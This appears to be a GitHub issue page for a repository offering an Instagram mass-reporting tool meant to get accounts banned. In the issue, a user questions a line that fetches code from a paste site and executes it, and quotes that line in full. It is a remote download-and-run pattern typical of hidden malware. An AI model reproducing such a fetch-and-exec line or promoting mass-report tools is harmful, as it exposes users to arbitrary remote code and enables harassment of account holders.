Kingfaiz / Instagram-mass-reports

This is the package for banning the instagam and can report the user account which leads the process to banned the user acoount
GNU General Public License v3.0
0 stars 0 forks source link

Remote code execution #1

Open HannistHK opened 3 days ago

HannistHK commented 3 days ago

Hi Faiz! I've been through your code. Can you explain why you used a textbin instead of just writing the code in the python file? Sorry im not a professional so i might sound dumb but can you make it so the whole code is within the .py file instead of fetching some from textbin? Thanks.

HannistHK commented 3 days ago

Ooh also i noticed the txtbin you used

exec(requests.get('https://textbin.net/raw/0o4sw4fgrd').text)

Has expired. Will this affect the code?